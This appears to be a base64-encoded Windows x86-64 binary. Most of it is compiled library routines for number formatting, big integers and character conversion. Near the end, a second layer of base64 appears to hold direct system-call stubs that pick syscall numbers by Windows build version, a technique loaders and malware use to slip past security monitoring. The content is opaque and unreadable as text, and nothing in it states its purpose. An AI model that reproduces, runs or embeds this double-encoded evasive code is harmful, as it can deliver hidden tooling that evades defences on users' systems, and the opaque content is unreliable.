QkSAkG6QP3//9mDx9EAAC6AQAAAMdEJFAAAAAAKcKJVCRg6Rn6//8PH4QAAAAAAGYP78nyQQ8qymYPLsh6CmYPL8gPhMn4//9Bg+oB6cD4//9mDx9EAACD6ATHRCRUAAAAAIlEJCDpIfr//8dEJGgBAAAARTH2RTHJx4QkjAAAAP/////HRCRM/////+l0+v//Zg8QyPIPWMjyD1gNVooAAGZID37KZkgPfshIweogicCB6gAAQANIweIgSAnQ8g9cBTmKAABmSA9uyGYPL8EPh4IJAABmD1cNMooAAGYPL8gPh9cAAADHRCRUAAAAAEWF7Q+IpwAAAItEJHA5RxQPjJoAAABIixVjjAAASJhIicfyDxAUwkWF9g+J8wQAAItEJEyFwA+P5wQAAA+FjQAAAPIPWRXGiQAAZg8vlCSAAAAAc3qDxwJIi1wkWEUx7UUx5Il8JFDpVf7//w8fQACD+AMPha/7///HRCRoAAAAAItEJHBEAfCJhCSMAAAAg8ABiUQkTIXAD45XBAAAiYQknAAAAInB6Tn5//8PH0AARItcJGhFhdsPheL7//9Ei2wkdItsJGBFMeTpZPz//0Ux7UUx5EH33sdEJEgQAAAASItcJFhEiXQkUOnj/f//kESJ0kyJ6egVEgAAhNtEi1QkdEmJxQ+FsAgAAMdEJHQAAAAAQYtFFIPoAUiYQQ+9fIUYg/cf6eL8//9mDx9EAACLRCRwg8ABiUQkUItEJGiFwA+EyQIAAI0UL4XSfgtMieHouhMAAEmJxItEJHRNieaFwA+FnAcAAEiLRCRYSIl0JGjHhCScAAAAAQAAAEiJRCRA6a0AAABmDx+EAAAAAABIicHoOA4AALgBAAAAhf8PiAEFAAALfCQgdQ5Ii3wkOPYHAQ+E7QQAAEiLdCRASI1uAYXAfguDfCRUAg+FrwcAAIhd/4tEJEw5hCScAAAAD4TGBwAATIn5RTHAugoAAADoSw4AAEUxwLoKAAAATInhSYnHTTn0D4QkAQAA6C8OAABMifFFMcC6CgAAAEmJxOgcDgAASYnGg4QknAAAAAFIiWwkQEyJ6kyJ+ejR8f//TIniTIn5icaNWDDo0RMAAEyJ8kyJ6YnH6BQUAACLaBCF7Q+FKf///0iJwkyJ+UiJRCRg6KkTAABMi0QkYInFTInB6EoNAACLRCQgCegPhbcJAABIi0wkOIsRiVQkYIPiAQtUJFQPhfP+//9Ii1QkQIl0JCBIi3QkaEiNagGD+zkPhLIHAACF/w+OWQkAAItcJCC4IAAAAIPDMUiLfCRAiUQkSIgfTInnTYn0Zg8fRAAATInp6NgMAABNheQPhAEDAABIhf8PhKIHAABMOecPhJkHAABIifnotQwAAEiLXCRYSIlsJFjptfv//2YPH0QAAOgLDQAASYnESYnG6ef+///HRCRoAQAAAOk0/f//Dx8Ag3wkIAEPjqT5//+LRCRMi0wkdIPoATnBD4y9AgAAKcFBic2LRCRMhcAPiA0FAACLTCRgAUQkUImEJJwAAAAByInNiUQkYOl5+f//Dx9EAABMiepMifnodRIAAIXAD4m4+v//i0QkcEUxwLoKAAAATIn5g+gBiUQkQOhyDAAAi1QkaEmJx4uEJIwAAACFwA+ewCHDhdIPhVQHAACE2w+FoQYAAItEJHCJRCRQi4QkjAAAAIlEJExmLg8fhAAAAAAAx4QknAAAAAEAAABIi2wkWIt8JEzrJWYuDx+EAAAAAABMiflFMcC6CgAAAOgADAAAg4QknAAAAAFJicdMiepMiflIg8UB6Lbv//+NWDCIXf85vCScAAAAfMcx/4tMJFSFyQ+E4wEAAEGLRxQPtlX/g/kCD4QIAgAAg/gBfwlFi0cYRYXAdEFIi0wkWOsTDx8ASDnID4SXAQAAD7ZQ/0iJxUiNRf+A+jl054PCAcdEJEggAAAAiBDpJf7//w8fRAAAD7ZV/kiJxUiNRf+A+jB08OkL/v//Dx8Ax0QkaAEAAADpz/T//8eEJJwAAAABAAAAuQEAAADp2/T//0hjRCRwSIsVaocAAMdEJEz/////8g8QFMLyDxCEJIAAAABEi0QkcMeEJJwAAAABAAAASIt8JFhmDxDIQYPAAfIPXspEiUQkUEiNRwHyDyzJZg/vyfIPKsmNUTCIF/IPWcryD1zBZg8uxg+LbAYAAPIPEB13hAAADx+AAAAAAIuUJJwAAAA7VCRMD4TsAQAA8g9Zw4PCAUiDwAGJlCScAAAAZg8QyPIPXsryDyzJZg/vyfIPKsmNUTCIUP/yD1nK8g9cwWYPLsZ6tXWzSItcJFhIiUQkWOkD+f//i1QkdEyJ+USJVCR46BsNAABEi1QkeEmJx+m89///SItcJFhIiWwkWOnW+P//TIn5RIlUJHTo8gwAAESLVCR0SYnH6ZP3//+JwitUJHRFMe2JRCR0QQHS6TP9//9Ii0QkWINEJFABx0QkSCAAAADGADHplvz//0yJ+boBAAAA6KkOAABMiepIicFJicfoqw8AAA+2Vf+FwA+PFf7//3UJg+MBD4UK/v//QYtHFIP4AQ+O2QQAAMdEJEgQAAAA6TH+//9Ii3wkQESLXCRUiXQkIEiLdCRoTI1PAUyJzUWF2w+EVQMAAEGDfxQBD47IBAAAg3wkVAIPhIUDAABIiXQkIEyJz0yJ9kyLdCRA608PH4AAAAAAiF//RTHASInxugoAAABJif7oMgkAAEk59EyJ+boKAAAATA9E4EUxwEiJxUiDxwHoFAkAAEyJ6kiJ7kiJwUmJx+jT7P//jVgwSInyTInpSIn96NIOAACFwH+mTIl0JEBJifZIi3QkIIP7OQ+EDwMAAMdEJEggAAAATInng8MBTYn0SItEJECIGOlr+///i3wkVIX/D4QqAwAAg/8BD4TxAwAASItcJFhIiUQkWMdEJEgQAAAA6Tb3///yD1niSItEJFhmDxDIRTHAx4QknAAAAAEAAADyDxAVJIIAAOsbZi4PH4QAAAAAAPIPWcqDwQFFiciJjCScAAAA8g8s0YXSdA9mD+/bRYnI8g8q2vIPXMtIg8ABg8IwiFD/i4wknAAAAEQ52XXCRYTAD4QPAwAA8g8QBQGCAABmDxDU8g9Y0GYPL8oPh+ECAADyD1zEZg8vwQ+Gqff//2YPLs5Ii1wkWHoKZg8vzg+EpAMAAMdEJEgQAAAARI1FAUiJwkiNQP+Aev8wdPNIiVQkWESJRCRQ6Vv2///HhCScAAAAAAAAAItsJGArbCRM6XD0//+LTCRMhckPhPL2//9Ei5wkjAAAAEWF2w+ON/f///IPWQUvgQAA8g8QDS+BAAC9//////IPWcjyD1gNJoEAAGZID37KZkgPfshIweogicCB6gAAQANIweIgSAnQ6cTx//9Bi0wkCOjCBQAASY1UJBBJicZIjUgQSWNEJBRMjQSFCAAAAOgcEgAATInxugEAAADo1wsAAEmJxukn+P//i0cEg8ABO0QkQA+NrfT//4NEJGABg0QkUAHHRCR0AQAAAOmW9P//x0QkUAIAAABIi1wkWEUx7UUx5OlB9f//SIt0JGiD+zkPhOkAAABIi0QkQIPDAUyJ58dEJEggAAAATYn0iBjpRfn//0yJ50iLdCRoTYn06bD6//+LRwSDwAE5RCRAf4rpP/f//0Ep3ESJ6YtXBEUx9kGNRCQBRCnhx4QkjAAAAP////+JhCScAAAAx0QkTP////850Q+MvvL//+n48v//g0QkUAG6MQAAAEiJTCRYxgMw6avx//+FwH43TIn5ugEAAADo4QoAAEyJ6kiJwUmJx+jjCwAAhcAPjqsBAACD+zl0LYtcJCDHRCRUIAAAAIPDMUGDfxQBD45lAQAATInnx0QkSBAAAABNifTpAv3//0iLRCRATInnSItMJFhNifS6OQAAAMYAOekc+v//i0QkQIlEJHCLhCSMAAAAiUQkTOnT8///SItcJFhIiWwkWOkk9P//8g9YwA+2UP9mDy/CD4fvAAAAZg8uwkiLXCRYegt1CYDhAQ+F0vD//8dEJEgQAAAA6YD9//9mDy7GjX0BSItcJFhIiUQkWIl8JFAPipn8//9mDy/GD4WP/P//x0QkSAAAAADpxfP//419AUiLXCRYSInBiXwkUOmC8P//Zg8QyOno/P//TInhRTHAugoAAADo8QQAAEmJxITbD4U6////i0QkcIlEJFCLhCSMAAAAiUQkTOnV9f//QYtPGLgQAAAAhckPREQkSIlEJEjpTPn//w+2UP9Ii1wkWEiJwekc8P//RYtXGEWF0g+FK/v//4XAD49x/v//TInnTYn06b37//9Ii1wkWEiJwenv7///RYtPGEyJ502J9EWFyXRBx0QkSBAAAADplPv//w+E6vn//+mJ+f//dQn2wwEPhUr+///HRCRUIAAAAOlR/v//x0QkSAAAAABEjUUB6Vf8//+LRCRUiUQkSOlT+///QYN/FAF+CrgQAAAA6aL2//9Bg38YALoQAAAAD0XC6ZD2//+J6OlN9f//QVRVV1ZTSGNZFInVSYnKQYnRwf0FOet+f0yNYRhIY+1NjRycSY00rEGD4R8PhH4AAACLBkSJyb8gAAAASI1WBEQpz9PoQYnASTnTD4aXAAAATInmDx9AAIsCiflIg8YESIPCBNPgRInJRAnAiUb8RItC/EHT6Ek503fdSCnrSY1EnPxEiQBFhcB0QkiDwATrPA8fgAAAAABBx0IUAAAAAEHHQhgAAAAAW15fXUFcw5BMiedJOfN24A8fhAAAAAAApUk583f6SCnrSY0EnEwp4EjB+AJBiUIUhcB0xFteX11BXMMPH0QAAEGJQhiFwHSoTIng65ZmZi4PH4QAAAAAAEUxwEhjURRIjUEYSI0MkEg5yHIZ6ylmLg8fhAAAAAAASIPABEGDwCBIOcF2EosQhdJ07Ug5wXYH8w+80kEB0ESJwMOQkJCQkJCQkJCQkJCQVlNIg+woiwWksQAAic6D+AJ0e4XAdDmD+AF1I0iLHf24AAAPH0QAALkBAAAA/9OLBXuxAACD+AF07oP4AnRPSIPEKFtew2YuDx+EAAAAAAC4AQAAAIcFVbEAAIXAdVFIix2SuAAASI0NU7EAAP/TSI0NcrEAAP/TSI0NYQAAAOgcq///xwUisQAAAgAAAEhjzkiNBSixAABIjRSJSI0M0EiDxChbXkj/JTO4AAAPHwCD+AJ0G4sF9bAAAIP4AQ+EWP///+lx////Dx+AAAAAAMcF1rAAAAIAAADrsg8fQABTSIPsILgDAAAAhwXAsAAAg/gCdAtIg8QgW8MPH0QAAEiLHdG3AABIjQ2ysAAA/9NIjQ3RsAAASInYSIPEIFtI/+BmZi4PH4QAAAAAAA8fAFZTSIPsOInLMcnowf7//4P7CX5Midm+AQAAANPmSGPGSI0MhSMAAABIuPj///8HAAAASCHB6EYMAABIhcB0F4M9OrAAAAKJWAiJcAx0NUjHQBAAAAAASIPEOFteww8fAEiNFcmvAABIY8tIiwTKSIXAdC1MiwCDPQOwAAACTIkEynXLSIlEJChIjQ0BsAAA/xVDtwAASItEJCjrsg8fQACJ2b4BAAAASIsFsmQAAEyNBXumAADT5khj1kiJwUiNFJUjAAAATCnBSMHqA0jB+QOJ0kgB0UiB+SABAAAPhzL///9IjRTQSIkVc2QAAOlN////ZmYuDx+EAAAAAAAPHwBBVEiD7CBJicxIhcl0OoN5CAl+DEiDxCBBXOl5CwAAkDHJ6Kn9//9JY1QkCEiNBf2uAACDPUavAAACSIsM0EyJJNBJiQwkdAhIg8QgQVzDkEiNDTmvAABIg8QgQVxI/yV0tgAAZmYuDx+EAAAAAACQQVVBVFZTSIPsKItxFEmJzElj2EhjyjHSDx+EAAAAAABBi0SUGEgPr8FIAdhBiUSUGEiJw0iDwgFIwesgOdZ/4E2J5UiF23QaQTl0JAx+IUhjxoPGAU2J5UGJXIQYQYl0JBRMiehIg8QoW15BXEFdw0GLRCQIjUgB6BP+//9JicVIhcB03UiNSBBJY0QkFEmNVCQQTI0EhQgAAADoaAoAAEyJ4U2J7Ojl/v//66IPHwBTSIPsMInLMcnoovz//0iLBQOuAABIhcB0LkiLEIM9PK4AAAJIiRXtrQAAdGaJWBhIuwAAAAABAAAASIlYEEiDxDBbww8fQABIiwXxYgAASI0NuqQAAEiJwkgpykjB+gNIg8IFSIH6IAEAAHZDuSgAAADo6QkAAEiFwHTCSLoBAAAAAgAAAIM9060AAAJIiVAIdZpIiUQkKEiNDdGtAAD/FRO1AABIi0QkKOuBDx9AAEiNUChIiRWFYgAA678PHwBBV0FWQVVBVFVXVlNIg+woSGNpFEhjehRJic1Jidc5/XwOifhJic9IY/1JidVIY+gxyY0cL0E5XwwPnMFBA08I6Nv8//9JicRIhcAPhPQAAABMjVgYSGPDSY00g0k583MjSInwTInZMdJMKeBIg+gZSMHoAkyNBIUEAAAA6A8JAABJicNNjU0YTY13GEmNLKlJjTy+STnpD4OGAAAASIn4TCn4SYPHGUiD6BlIwegCTDn/TI0shQQAAAC4BAAAAEwPQujrDA8fAEmDwwRMOc12UkWLEUmDwQRFhdJ060yJ2UyJ8kUxwGYuDx+EAAAAAACLAkSLOUiDwgRIg8EESQ+vwkwB+EwBwEmJwIlB/EnB6CBIOdd32keJBCtJg8METDnNd66F238O6xcPH4AAAAAAg+sBdAuLRvxIg+4EhcB08EGJXCQUTIngSIPEKFteX11BXEFdQV5BX8MPH4AAAAAAQVZBVUFUVVdWU0iD7CCJ0EmJzYnTg+ADD4U6AQAAwfsCTYnsdHVIiz2jogAASIX/D4RSAQAATYnsTIstWLMAAEiNLamrAABNie7rEw8fQADR+3RHSIs3SIX2dFRIiff2wwF07EiJ+kyJ4egx/v//SInGSIXAD4QFAQAATYXkD4ScAAAAQYN8JAgJflRMieFJifTowQcAANH7dblMieBIg8QgW15fXUFcQV1BXsMPHwC5AQAAAOjW+f//SIs3SIX2dG6DPXerAAACdZFIjQ2mqwAAQf/W64VmDx+EAAAAAAAxyeip+f//SWNEJAiDPU2rAAACSItUxQBMiWTFAEmJFCRJifQPhUb///9IjQ0/qwAAQf/V6Tf///8PH4AAAAAASYnE6Sj///8PH4QAAAAAAEiJ+kiJ+ehl/f//SIkHSInGSIXAdDpIxwAAAAAA6XD///9mDx9EAACD6AFIjRXOdQAARTHASJiLFILowfv//0mJxUiFwA+Fo/7//w8fRAAARTHk6RP///+5AQAAAOj++P//SIs9N6EAAEiF/3Qfgz2bqgAAAg+Fi/7//0iNDcaqAAD/FeCxAADpef7//7kBAAAA6Pn5//9IicdIhcB0Hki4AQAAAHECAABIiT3woAAASIlHFEjHBwAAAADrsUjHBdigAAAAAAAARTHk6Zv+//9BVkFVQVRVV1ZTSIPsIEmJzInWi0kIidNBi2wkFMH+BUGLRCQMAfVEjW0BQTnFfgoBwIPBAUE5xX/26IH5//9JicZIhcAPhKIAAABIjXgYhfZ+F0hj9kiJ+THSSMHmAkmJ8EgB9+jGBQAASWNEJBRJjXQkGEyNDIaD4x8PhH8AAABBuiAAAABJifgx0kEp2pCLBonZSYPABEiDxgTT4ESJ0QnQQYlA/ItW/NPqSTnxd99MichJjUwkGUwp4EiD6BlIwegCSTnJuQQAAABIjQSFBAAAAEgPQsGF0kEPRe2JFAdBiW4UTInh6NP5//9MifBIg8QgW15fXUFcQV1BXsOQpUk58XbbpUk58Xf069NmkEhjQhREi0EUSYnRQSnAdTxIjRSFAAAAAEiDwRhIjQQRSY1UERjrDmYPH4QAAAAAAEg5wXMXSIPoBEiD6gREixJEORB060UZwEGDyAFEicDDQVRVV1ZTSIPsIEhjQhSLeRRIic5IidMpxw+FYQEAAEiNFIUAAAAASI1JGEiNBBFIjVQTGOsTZi4PH4QAAAAAAEg5wQ+DVwEAAEiD6ARIg+oERIsaRDkYdOcPgiwBAACLTgjo+ff//0mJwEiFwA+E+AAAAIl4EEhjRhRIjW4YTY1gGLkYAAAAMdJJicFMjVyFAEhjQxRIjXyDGGYPH0QAAIsEDkgp0IsUC0gp0EGJBAhIicJIg8EEQYnCSMHqIEiNBBmD4gFIOcd31kiJ+EiNcxlIKdi7AAAAAEiD6BlIicFIg+D8SMHpAkg590gPQsNIjQyNBAAAALsEAAAATAHgSDn3SA9Cy0gBzUkBzEk563Y/TInjSInpZg8fhAAAAAAAiwFIg8EESIPDBEgp0EiJwolD/EGJwkjB6iCD4gFJOct33kmNQ/9IKehIg+D8TAHgRYXSdRIPHwCLUPxIg+gEQYPpAYXSdPFFiUgUTInASIPEIFteX11BXMMPH4AAAAAAvwAAAAAPidT+//9IifC/AQAAAEiJ3kiJw+nB/v//ZpAxyei59v//SYnASIXAdLxMicBJx0AUAQAAAEiDxCBbXl9dQVzDZmYuDx+EAAAAAABBVFNIY0EUTI1ZGEmJ1LkgAAAATY0Mg4nIRYtB/E2NUfxBD73Qg/IfKdBBiQQkg/oKD46JAAAAg+oLTTnTc2FFi1H4hdJ0YInLRInAidFFidAp09PgidlB0+iJ0UmNUfhECcBB0+INAADwP0jB4CBJOdNzC0GLUfSJ2dPqQQnSSLoAAAAA/////0gh0EwJ0GZID27AW0Fcww8fhAAAAAAARTHShdJ1WUSJwA0AAPA/SMHgIEwJ0GZID27AW0Fcw5C5CwAAAESJwDHbKdHT6A0AAPA/SMHgIE0503MGQYtZ+NPrjUoVQdPgQQnYTAnAZkgPbsBbQVzDZg8fhAAAAAAARInAidFFMdLT4A0AAPA/SMHgIOln////Dx+EAAAAAABXVlNIg+wguQEAAABmSA9+w0iJ10yJxuhU9f//SYnCSIXAD4SOAAAASInZSInYSMHpIInKwekUgeL//w8AQYnRQYHJAAAQAIHh/wcAAEEPRdFBiciF23RwRTHJ80QPvMtEicnT6EWFyXQTuSAAAACJ00QpydPjRInJCdjT6kGJQhiD+gG4AQAAAIPY/0GJUhxBiUIURYXAdVFIY9DB4AVBgekyBAAAQQ+9VJIURIkPg/IfKdCJBkyJ0EiDxCBbXl/DDx+AAAAAADHJQcdCFAEAAAC4AQAAAPMPvMrT6kSNSSBBiVIYRYXAdK9DjYQIzfv//4kHuDUAAABEKciJBkyJ0EiDxCBbXl/DDx+AAAAAAEiJyEiJ0UiNUgEPtgmICITJdBYPH0QAAA+2CkiDwAFIg8IBiAiEyXXvw5CQkJCQkEUxwEiJyEiF0nUU6xcPHwBIg8ABSYnASSnISTnQcwWAOAB17EyJwMOQkJCQkJCQkDHASYnQSIXSdQ/rFw8fQABIg8ABSTnAdApmgzxBAHXwSYnATInAw5CQkJCQkJCQkP8lKq0AAJCQ/yUarQAAkJD/JQqtAACQkP8l+qwAAJCQ/yXqrAAAkJD/JdqsAACQkP8lyqwAAJCQ/yW6rAAAkJD/JaqsAACQkP8lmqwAAJCQ/yWKrAAAkJD/JXqsAACQkP8laqwAAJCQ/yVarAAAkJD/JUqsAACQkP8lOqwAAJCQ/yUqrAAAkJD/JRqsAACQkP8lCqwAAJCQ/yX6qwAAkJD/JeKrAACQkP8lyqsAAJCQ/yWyqwAAkJD/JZqrAACQkP8liqsAAJCQ/yVyqwAAkJD/JWKrAACQkP8lUqsAAJCQ/yUyqwAAkJD/JRKrAACQkFdTSIPsSEiJz0iJ00iF0g+EMwEAAE2FwA+EMwEAAEGLAQ+2EkHHAQAAAACJRCQ8hNIPhKEAAACDvCSIAAAAAXZ3hMAPhacAAABMiUwkeIuMJIAAAABMiUQkcP8VUKoAAIXAdFRMi0QkcEyLTCR4SYP4AQ+E9QAAAEiJfCQgQbkCAAAASYnYx0QkKAEAAACLjCSAAAAAuggAAAD/FSCqAACFwA+EsAAAALgCAAAASIPESFtfww8fQACLhCSAAAAAhcB1TQ+2A2aJB7gBAAAASIPESFtfww8fADHSMcBmiRFIg8RIW1/DZi4PH4QAAAAAAIhUJD1BuQIAAABMjUQkPMdEJCgBAAAASIlMJCDrgGaQx0QkKAEAAACLjCSAAAAASYnYQbkBAAAASIl8JCC6CAAAAP8ViKkAAIXAdBy4AQAAAOucDx9EAAAxwEiDxEhbX8O4/v///+uH6GP+///HACoAAAC4/////+ly////D7YDQYgBuP7////pYv///w8fAEFVQVRXVlNIg+xAMcBJicxIhclmiUQkPkiNRCQ+TInLTA9E4EmJ1UyJxujpBAAAicfo6gQAAEiF24l8JChJifCJRCQgTI0NDaIAAEyJ6kyJ4UwPRcvoJv7//0iYSIPEQFteX0FcQV3DDx+EAAAAAABBVkFVQVRVV1ZTSIPsQEiNBc+hAABNic1NhclJic5IidNMD0ToTInG6IMEAACJxeh0BAAAicdIhdsPhMEAAABIixNIhdIPhLUAAABNhfZ0cEUx5EiF9nUf60pmDx9EAABIixNImEmDxgJJAcRIAcJIiRNMOeZ2LYl8JChJifBNielMifGJbCQgTSng6ID9//+FwH/MTDnmdguFwHUHSMcDAAAAAEyJ4EiDxEBbXl9dQVxBXUFew2YuDx+EAAAAAAAxwEGJ/kiNdCQ+RTHkZolEJD7rDA8fQABImEiLE0kBxIl8JChMAeJNielNifCJbCQgSInx6Bf9//+FwH/b66WQRTHk659mZi4PH4QAAAAAAEFUV1ZTSIPsSDHASYnMSInWTInDZolEJD7oegMAAInH6HsDAABIhduJfCQoSYnwSI0VmqAAAIlEJCBIjUwkPkgPRNpMieJJidnosvz//0iYSIPESFteX0Fcw5CQkJCQkEiD7FhIichmiVQkaESJwUWFwHUcZoH6/wB3WYgQuAEAAABIg8RYw2YPH4QAAAAAAEiNVCRMRIlMJChMjUQkaEG5AQAAAEiJVCQ4MdLHRCRMAAAAAEjHRCQwAAAAAEiJRCQg/xUwpwAAhcB0CItUJEyF0nSu6Of7///HACoAAAC4/////0iDxFjDDx+AAAAAAEFUVlNIg+wwSIXJSYnMSI1EJCuJ00wPRODoigIAAInG6IsCAAAPt9NBifFMieFBicDoOv///0iYSIPEMFteQVzDZmYuDx+EAAAAAAAPH0AAQVZBVUFUVVdWU0iD7DBFMfZJidRIictMicXoQQIAAInH6DICAABJizQkQYnFSIX2dE1Ihdt0YUiF7XUn6Y8AAAAPH4AAAAAASJhIAcNJAcaAe/8AD4SGAAAASIPGAkw59XZtD7cWRYnpQYn4SInZ6Kz+//+FwH/QScfG/////0yJ8EiDxDBbXl9dQVxBXUFeww8fgAAAAABIjWwkK+sXkEhj0IPoAUiYSQHWgHwEKwB0PkiDxgIPtxZFielBifhIienoWf7//4XAf9Xrqw8fAEmJNCTrqWYuDx+EAAAAAABJxwQkAAAAAEmD7gHrkWaQSYPuAeuJkJCQkJCQkJCQkFNIg+wgicvoRAEAAInZSI0USUjB4gRIAdBIg8QgW8OQSIsFeZ4AAMMPH4QAAAAAAEiJyEiHBWaeAADDkJCQkJBTSIPsIEiJyzHJ6LH///9IOcNyD7kTAAAA6KL///9IOcN2FUiNSzBIg8QgW0j/Jd2kAAAPH0QAADHJ6IH///9JicBIidhMKcBIwfgEacCrqqqqjUgQ6K4AAACBSxgAgAAASIPEIFvDZg8fhAAAAAAAU0iD7CBIicsxyehB////SDnDcg+5EwAAAOgy////SDnDdhVIjUswSIPEIFtI/yWVpAAADx9EAACBYxj/f///McnoCv///0gpw0jB+wRp26uqqqqNSxBIg8QgW+kwAAAASIsF2WkAAEiLAMOQkJCQkEiLBdlpAABIiwDDkJCQkJBIiwXZaQAASIsAw5CQkJCQ/yUapQAAkJD/JQKlAACQkP8loqQAAJCQ/yWCpAAAkJD/JXKkAACQkA8fhAAAAAAA/yVKpAAAkJD/JTqkAACQkP8lKqQAAJCQ/yUapAAAkJD/JQqkAACQkP8l+qMAAJCQ/yXqowAAkJD/JdqjAACQkP8lyqMAAJCQ/yW6owAAkJD/JaqjAACQkP8lmqMAAJCQ/yWKowAAkJD/JXqjAACQkP8laqMAAJCQ/yVaowAAkJBVU0iD7DhIjawkgAAAAEiJTdBIiVXYTIlF4EyJTehIjUXYSIlFoEiLXaC5AQAAAEiLBepQAAD/0EmJ2EiLVdBIicHoian//4lFrItFrEiDxDhbXcOQkJCQkJCQkJCQkJDp25X//5CQkJCQkJCQkJCQ//////////9Af0AAAAAAAAAAAAAAAAAA//////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFYwaUo1MGlENVBCSWcrd2c2TDhzQUFCSWlmeGZ3Mll1RHgrRUFBQUFBQUREWmk0UEg0UUFBQUFBQUE4ZlJBQUFaVWlMQkNWZ0FBQUFnN2dZQVFBQUJuUU9nN2dZQVFBQUNuUlE2VDhCQUFDRHVCd0JBQUFCZEIrRHVCd0JBQUFDRDRUT0FBQUFnN2djQVFBQUF3K0V5QUFBQU9rWEFRQUFab0c0SUFFQUFMQWRENFNmQUFBQVpvRzRJQUVBQUxFZEQ0U1hBQUFBNmZRQUFBQm1nYmdnQVFBQUFDZ1BoSmdBQUFCbWdiZ2dBUUFBV2lrUGhKQUFBQUJtZ2JnZ0FRQUFPVGdQaElnQUFBQm1nYmdnQVFBQTF6b1BoSUFBQUFCbWdiZ2dBUUFBcXo5MGZHYUJ1Q0FCQUFEdVFuUjRab0c0SUFFQUFHTkZkSFJtZ2JnZ0FRQUF1a2QwY0dhQnVDQUJBQUM3UjNSc1pvRzRJQUVBQUdGS2RHaG1nYmdnQVFBQVlrcDBaT3RwdUQ0QUFBRHJZN2crQUFBQTYxeTRQd0FBQU90VnVFQUFBQURyVHJoQkFBQUE2MGU0UVFBQUFPdEF1RUVBQUFEck9iaEJBQUFBNnpLNFFRQUFBT3NydUVFQUFBRHJKTGhCQUFBQTZ4MjRRUUFBQU9zV3VFRUFBQURyRDdoQkFBQUE2d2k0UVFBQUFPc0J3MG1KeWc4RncyVklpd1FsWUFBQUFJTzRHQUVBQUFaMERvTzRHQUVBQUFwMFVPay9BUUFBZzdnY0FRQUFBWFFmZzdnY0FRQUFBZytFemdBQUFJTzRIQUVBQUFNUGhNZ0FBQURwRndFQUFHYUJ1Q0FCQUFDd0hRK0Vud0FBQUdhQnVDQUJBQUN4SFErRWx3QUFBT24wQUFBQVpvRzRJQUVBQUFBb0Q0U1lBQUFBWm9HNElBRUFBRm9wRDRTUUFBQUFab0c0SUFFQUFEazRENFNJQUFBQVpvRzRJQUVBQU5jNkQ0U0FBQUFBWm9HNElBRUFBS3MvZEh4bWdiZ2dBUUFBN2tKMGVHYUJ1Q0FCQUFCalJYUjBab0c0SUFFQUFMcEhkSEJtZ2JnZ0FRQUF1MGQwYkdhQnVDQUJBQUJoU25Sb1pvRzRJQUVBQUdKS2RHVHJhYmc1QUFBQTYyTzRPUUFBQU90Y3VEb0FBQURyVmJnN0FBQUE2MDY0UEFBQUFPdEh1RHdBQUFEclFMZzhBQUFBNnptNFBBQUFBT3N5dUR3QUFBRHJLN2c4QUFBQTZ5UzRQQUFBQU9zZHVEd0FBQURyRnJnOEFBQUE2dys0UEFBQUFPc0l1RHdBQUFEckFjTkppY29QQmNObFNJc0VKV0FBQUFDRHVCZ0JBQUFHZEE2RHVCZ0JBQUFLZEZEcFB3RUFBSU80SEFFQUFBRjBINE80SEFFQUFBSVBoTTRBQUFDRHVCd0JBQUFERDRUSUFBQUE2UmNCQUFCbWdiZ2dBUUFBc0IwUGhKOEFBQUJtZ2JnZ0FRQUFzUjBQaEpjQUFBRHA5QUFBQUdhQnVDQUJBQUFBS0ErRW1BQUFBR2FCdUNBQkFBQmFLUStFa0FBQUFHYUJ1Q0FCQUFBNU9BK0VpQUFBQUdhQnVDQUJBQURYT2crRWdBQUFBR2FCdUNBQkFBQ3JQM1I4Wm9HNElBRUFBTzVDZEhobWdiZ2dBUUFBWTBWMGRHYUJ1Q0FCQUFDNlIzUndab0c0SUFFQUFMdEhkR3htZ2JnZ0FRQUFZVXAwYUdhQnVDQUJBQUJpU25SazYybTRQd0FBQU90anVEOEFBQURyWExoQUFBQUE2MVc0UVFBQUFPdE91RUlBQUFEclI3aENBQUFBNjBDNFFnQUFBT3M1dUVJQUFBRHJNcmhDQUFBQTZ5dTRRZ0FBQU9za3VFSUFBQURySGJoQ0FBQUE2eGE0UWdBQUFPc1B1RUlBQUFEckNMaENBQUFBNndIRFNZbktEd1hEWlVpTEJDVmdBQUFBZzdnWUFRQUFCblFPZzdnWUFRQUFDblJRNlQ4QkFBQ0R1QndCQUFBQmRCK0R1QndCQUFBQ0Q0VE9BQUFBZzdnY0FRQUFBdytFeUFBQUFPa1hBUUFBWm9HNElBRUFBTEFkRDRTZkFBQUFab0c0SUFFQUFMRWRENFNYQUFBQTZmUUFBQUJtZ2JnZ0FRQUFBQ2dQaEpnQUFBQm1nYmdnQVFBQVdpa1BoSkFBQUFCbWdiZ2dBUUFBT1RnUGhJZ0FBQUJtZ2JnZ0FRQUExem9QaElBQUFBQm1nYmdnQVFBQXF6OTBmR2FCdUNBQkFBRHVRblI0Wm9HNElBRUFBR05GZEhSbWdiZ2dBUUFBdWtkMGNHYUJ1Q0FCQUFDN1IzUnNab0c0SUFFQUFHRktkR2htZ2JnZ0FRQUFZa3AwWk90cHVDTUFBQURyWTdnakFBQUE2MXk0SkFBQUFPdFZ1Q1VBQUFEclRyZ21BQUFBNjBlNEpnQUFBT3RBdUNZQUFBRHJPYmdtQUFBQTZ6SzRKZ0FBQU9zcnVDWUFBQURySkxnbUFBQUE2eDI0SmdBQUFPc1d1Q1lBQUFEckQ3Z21BQUFBNndpNEpnQUFBT3NCdzBtSnlnOEZ3MlZJaXdRbFlBQUFBSU80R0FFQUFBWjBEb080R0FFQUFBcDBVT2svQVFBQWc3Z2NBUUFBQVhRZmc3Z2NBUUFBQWcrRXpnQUFBSU80SEFFQUFBTVBoTWdBQUFEcEZ3RUFBR2FCdUNBQkFBQ3dIUStFbndBQUFHYUJ1Q0FCQUFDeEhRK0Vsd0FBQU9uMEFBQUFab0c0SUFFQUFBQW9ENFNZQUFBQVpvRzRJQUVBQUZvcEQ0U1FBQUFBWm9HNElBRUFBRGs0RDRTSUFBQUFab0c0SUFFQUFOYzZENFNBQUFBQVpvRzRJQUVBQUtzL2RIeG1nYmdnQVFBQTdrSjBlR2FCdUNBQkFBQmpSWFIwWm9HNElBRUFBTHBIZEhCbWdiZ2dBUUFBdTBkMGJHYUJ1Q0FCQUFCaFNuUm9ab0c0SUFFQUFHSktkR1RyYWJqNUFBQUE2Mk80K1